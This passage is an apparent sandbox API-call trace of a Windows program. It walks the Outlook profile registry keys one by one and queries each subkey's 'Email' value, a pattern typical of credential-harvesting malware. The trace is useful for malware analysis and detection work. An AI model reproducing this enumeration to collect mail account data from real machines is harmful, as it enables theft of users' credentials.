GetProcessHeap () returned 0x6a0000 [0129.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.667] RegCloseKey (hKey=0x210) returned 0x0 [0129.667] GetProcessHeap () returned 0x6a0000 [0129.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0129.668] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.668] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x2, pszName=0x6bb848, pcchName=0x19fb7c | out: pszName="2db91c5fd8470d46b1a5bc5efab4cae7", pcchName=0x19fb7c) returned 0x0 [0129.669] GetProcessHeap () returned 0x6a0000 [0129.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baac0 [0129.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.670] RegOpenKeyW (in: hKey=0x218, lpSubKey="2db91c5fd8470d46b1a5bc5efab4cae7", phkResult=0x6baac0 | out: phkResult=0x6baac0*=0x210) returned 0x0 [0129.671] GetProcessHeap () returned 0x6a0000 [0129.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bbc60 [0129.671] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.672] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6bbc60, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x6bbc60, pcbData=0x19f6f0*=0x208) returned 0x2 [0129.672] GetProcessHeap () returned 0x6a0000 [0129.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.673] GetProcessHeap () returned 0x6a0000 [0129.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bbc60 [0129.674] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.674] wvsprintfW (in: param_1=0x6bbc60, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\2db91c5fd8470d46b1a5bc5efab4cae7") returned 88 [0129.674] GetProcessHeap () returned 0x6a0000 [0129.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb4) returned 0x6bac30 [0129.675] GetProcessHeap () returned 0x6a0000 [0129.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.675] GetProcessHeap () returned 0x6a0000 [0129.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0129.676] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.677] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\2db91c5fd8470d46b1a5bc5efab4cae7", phkResult=0x6ba970 | out: phkResult=0x6ba970*=0x204) returned 0x0 [0129.677] GetProcessHeap () returned 0x6a0000 [0129.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bbc60 [0129.677] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.677] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x6bbc60, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0129.678] GetProcessHeap () returned 0x6a0000 [0129.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.679] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.679] RegCloseKey (hKey=0x204) returned 0x0 [0129.679] GetProcessHeap () returned 0x6a0000 [0129.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0129.680] GetProcessHeap () returned 0x6a0000 [0129.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.686] RegCloseKey (hKey=0x210) returned 0x0 [0129.686] GetProcessHeap () returned 0x6a0000 [0129.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baac0 | out: hHeap=0x6a0000) returned 1 [0129.687] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.687] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x3, pszName=0x6bb848, pcchName=0x19fb7c | out: pszName="3517490d76624c419a828607e2a54604", pcchName=0x19fb7c) returned 0x0 [0129.688] GetProcessHeap () returned 0x6a0000 [0129.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baae0 [0129.688] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.689] RegOpenKeyW (in: hKey=0x218, lpSubKey="3517490d76624c419a828607e2a54604", phkResult=0x6baae0 | out: phkResult=0x6baae0*=0x210) returned 0x0 [0129.689] GetProcessHeap () returned 0x6a0000 [0129.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bbc60 [0129.690] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.690] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6bbc60, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x6bbc60, pcbData=0x19f6f0*=0x208) returned 0x2 [0129.690] GetProcessHeap () returned 0x6a0000 [0129.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.691] GetProcessHeap () returned 0x6a0000 [0129.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bbc60 [0129.691] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.692] wvsprintfW (in: param_1=0x6bbc60, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604") returned 88 [0129.692] GetProcessHeap () returned 0x6a0000 [0129.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb4) returned 0x6bac30 [0129.692] GetProcessHeap () returned 0x6a0000 [0129.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.693] GetProcessHeap () returned 0x6a0000 [0129.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab10 [0129.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.694] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", phkResult=0x6bab10 | out: phkResult=0x6bab10*=0x204) returned 0x0 [0129.694] GetProcessHeap () returned 0x6a0000 [0129.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bbc60 [0129.695] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.695] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x6bbc60, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0129.695] GetProcessHeap () returned 0x6a0000 [0129.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.697] RegCloseKey (hKey=0x204) returned 0x0 [0129.697] GetProcessHeap () returned 0x6a0000 [0129.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab10 | out: hHeap=0x6a0000) returned 1 [0129.697] GetProcessHeap () returned 0x6a0000 [0129.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.698] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.698] RegCloseKey (hKey=0x210) returned 0x0 [0129.699] GetProcessHeap () returned 0x6a0000 [0129.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baae0 | out: hHeap=0x6a0000) returned 1 [0129.699] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.699] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x4, pszName=0x6bb848, pcchName=0x19fb7c | out: pszName="6c29d51f56390b45a924b3b787013a66", pcchName=0x19fb7c) returned 0x0 [0129.701] GetProcessHeap () returned 0x6a0000 [0129.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0129.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.702] RegOpenKeyW (in: hKey=0x218, lpSubKey="6c29d51f56390b45a924b3b787013a66", phkResult=0x6ba9e0 | out: phkResult=0x6ba9e0*=0x210) returned 0x0 [0129.702] GetProcessHeap () returned 0x6a0000 [0129.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bbc60 [0129.703] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.703] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6bbc60, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x6bbc60, pcbData=0x19f6f0*=0x208) returned 0x2 [0129.703] GetProcessHeap () returned 0x6a0000 [0129.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.704] GetProcessHeap () returned 0x6a0000 [0129.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bbc60 [0129.704] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.705] wvsprintfW (in: param_1=0x6bbc60, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\6c29d51f56390b45a924b3b787013a66") returned 88 [0129.705] GetProcessHeap () returned 0x6a0000 [0129.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb4) returned 0x6bac30 [0129.705] GetProcessHeap () returned 0x6a0000 [0129.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.716] GetProcessHeap () returned 0x6a0000 [0129.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab00 [0129.716] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.717] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\6c29d51f56390b45a924b3b787013a66", phkResult=0x6bab00 | out: phkResult=0x6bab00*=0x204) returned 0x0 [0129.717] GetProcessHeap () returned 0x6a0000 [0129.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bbc60 [0129.718] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.719] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x6bbc60, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0129.719] GetProcessHeap () returned 0x6a0000 [0129.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.721] RegCloseKey (hKey=0x204) returned 0x0 [0129.721] GetProcessHeap () returned 0x6a0000 [0129.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab00 | out: hHeap=0x6a0000) returned 1 [0129.721] GetProcessHeap () returned 0x6a0000 [0129.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.723] RegCloseKey (hKey=0x210) returned 0x0 [0129.723] GetProcessHeap () returned 0x6a0000 [0129.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0129.724] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.724] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x5, pszName=0x6bb848, pcchName=0x19fb7c | out: pszName="8503020000000000c000000000000046", pcchName=0x19fb7c) returned 0x0 [0129.724] GetProcessHeap () returned 0x6a0000 [0129.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa00 [0129.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.727] RegOpenKeyW (in: hKey=0x218, lpSubKey="8503020000000000c000000000000046", phkResult=0x6baa00 | out: phkResult=0x6baa00*=0x210) returned 0x0 [0129.727] GetProcessHeap () returned 0x6a0000 [0129.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bbc60 [0129.728] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.728] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6bbc60, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x6bbc60, pcbData=0x19f6f0*=0x208) returned 0x2 [0129.728] GetProcessHeap () returned 0x6a0000 [0129.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.729] GetProcessHeap () returned 0x6a0000 [0129.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bbc60 [0129.730] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.731] wvsprintfW (in: param_1=0x6bbc60, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046") returned 88 [0129.731] GetProcessHeap () returned 0x6a0000 [0129.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb4) returned 0x6bac30 [0129.731] GetProcessHeap () returned 0x6a0000 [0129.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0129.733] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.733] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", phkResult=0x6baa90 | out: phkResult=0x6baa90*=0x204) returned 0x0 [0129.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bbc60 [0129.737] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.737] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x6bbc60, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0129.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.740] RegCloseKey (hKey=0x204) returned 0x0 [0129.741] GetProcessHeap () returned 0x6a0000 [0129.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0129.741] GetProcessHeap () returned 0x6a0000 [0129.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.743] RegCloseKey (hKey=0x210) returned 0x0 [0129.743] GetProcessHeap () returned 0x6a0000 [0129.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa00 | out: hHeap=0x6a0000) returned 1 [0129.744] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.744] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x6, pszName=0x6bb848, pcchName=0x19fb7c | out: pszName="8763203907727d498bce4b981b157d7b", pcchName=0x19fb7c) returned 0x0 [0129.744] GetProcessHeap () returned 0x6a0000 [0129.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0129.745] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.746] RegOpenKeyW (in: hKey=0x218, lpSubKey="8763203907727d498bce4b981b157d7b", phkResult=0x6baa60 | out: phkResult=0x6baa60*=0x210) returned 0x0 [0129.746] GetProcessHeap () returned 0x6a0000 [0129.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bbc60 [0129.747] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.748] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6bbc60, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x6bbc60, pcbData=0x19f6f0*=0x208) returned 0x2 [0129.748] GetProcessHeap () returned 0x6a0000 [0129.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.748] GetProcessHeap () returned 0x6a0000 [0129.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bbc60 [0129.750] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.751] wvsprintfW (in: param_1=0x6bbc60, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8763203907727d498bce4b981b157d7b") returned 88 [0129.751] GetProcessHeap () returned 0x6a0000 [0129.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb4) returned 0x6bac30 [0129.751] GetProcessHeap () returned 0x6a0000 [0129.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.752] GetProcessHeap () returned 0x6a0000 [0129.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9c0 [0129.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.754] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8763203907727d498bce4b981b157d7b", phkResult=0x6ba9c0 | out: phkResult=0x6ba9c0*=0x204) returned 0x0 [0129.754] GetProcessHeap () returned 0x6a0000 [0129.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bbc60 [0129.755] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.756] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x6bbc60, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0129.756] GetProcessHeap () returned 0x6a0000 [0129.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.759] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.823] RegCloseKey (hKey=0x204) returned 0x0 [0129.823] GetProcessHeap () returned 0x6a0000 [0129.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9c0 | out: hHeap=0x6a0000) returned 1 [0129.823] GetProcessHeap () returned 0x6a0000 [0129.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.824] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.825] RegCloseKey (hKey=0x210) returned 0x0 [0129.825] GetProcessHeap () returned 0x6a0000 [0129.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0129.826] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.826] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x7, pszName=0x6bb848, pcchName=0x19fb7c | out: pszName="893893ade607c44aa338ac7df5d6cb42", pcchName=0x19fb7c) returned 0x0 [0129.826] GetProcessHeap () returned 0x6a0000 [0129.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baab0 [0129.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.827] RegOpenKeyW (in: hKey=0x218, lpSubKey="893893ade607c44aa338ac7df5d6cb42", phkResult=0x6baab0 | out: phkResult=0x6baab0*=0x210) returned 0x0 [0129.827] GetProcessHeap () returned 0x6a0000 [0129.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bbc60 [0129.828] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.828] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6bbc60, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x6bbc60, pcbData=0x19f6f0*=0x208) returned 0x2 [0129.828] GetProcessHeap () returned 0x6a0000 [0129.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.829] GetProcessHeap () returned 0x6a0000 [0129.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bbc60 [0129.829] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.830] wvsprintfW (in: param_1=0x6bbc60, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\893893ade607c44aa338ac7df5d6cb42") returned 88 [0129.830] GetProcessHeap () returned 0x6a0000 [0129.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb4) returned 0x6bac30 [0129.830] GetProcessHeap () returned 0x6a0000 [0129.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.831] GetProcessHeap () returned 0x6a0000 [0129.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab10 [0129.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.832] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\893893ade607c44aa338ac7df5d6cb42", phkResult=0x6bab10 | out: phkResult=0x6bab10*=0x204) returned 0x0 [0129.833] GetProcessHeap () returned 0x6a0000 [0129.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bbc60 [0129.833] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.833] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x6bbc60, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0129.833] GetProcessHeap () returned 0x6a0000 [0129.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.835] RegCloseKey (hKey=0x204) returned 0x0 [0129.835] GetProcessHeap () returned 0x6a0000 [0129.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab10 | out: hHeap=0x6a0000) returned 1 [0129.835] GetProcessHeap () returned 0x6a0000 [0129.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.841] RegCloseKey (hKey=0x210) returned 0x0 [0129.841] GetProcessHeap () returned 0x6a0000 [0129.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baab0 | out: hHeap=0x6a0000) returned 1 [0129.843] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.844] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x8, pszName=0x6bb848, pcchName=0x19fb7c | out: pszName="9207f3e0a3b11019908b08002b2a56c2", pcchName=0x19fb7c) returned 0x0 [0129.844] GetProcessHeap () returned 0x6a0000 [0129.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0129.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.846] RegOpenKeyW (in: hKey=0x218, lpSubKey="9207f3e0a3b11019908b08002b2a56c2", phkResult=0x6ba9e0 | out: phkResult=0x6ba9e0*=0x210) returned 0x0 [0129.846] GetProcessHeap () returned 0x6a0000 [0129.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bbc60 [0129.847] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.848] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6bbc60, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x6bbc60, pcbData=0x19f6f0*=0x208) returned 0x2 [0129.848] GetProcessHeap () returned 0x6a0000 [0129.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.848] GetProcessHeap () returned 0x6a0000 [0129.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bbc60 [0129.849] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.850] wvsprintfW (in: param_1=0x6bbc60, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2") returned 88 [0129.850] GetProcessHeap () returned 0x6a0000 [0129.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb4) returned 0x6bac30 [0129.850] GetProcessHeap () returned 0x6a0000 [0129.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.852] GetProcessHeap () returned 0x6a0000 [0129.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0129.853] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.854] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", phkResult=0x6baa90 | out: phkResult=0x6baa90*=0x204) returned 0x0 [0129.854] GetProcessHeap () returned 0x6a0000 [0129.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bbc60 [0129.855] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.856] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x6bbc60, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0129.856] GetProcessHeap () returned 0x6a0000 [0129.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.857] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.858] RegCloseKey (hKey=0x204) returned 0x0 [0129.858] GetProcessHeap () returned 0x6a0000 [0129.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0129.858] GetProcessHeap () returned 0x6a0000 [0129.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.860] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.860] RegCloseKey (hKey=0x210) returned 0x0 [0129.860] GetProcessHeap () returned 0x6a0000 [0129.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0129.861] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.861] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x9, pszName=0x6bb848, pcchName=0x19fb7c | out: pszName="9375CFF0413111d3B88A00104B2A6676", pcchName=0x19fb7c) returned 0x0 [0129.862] 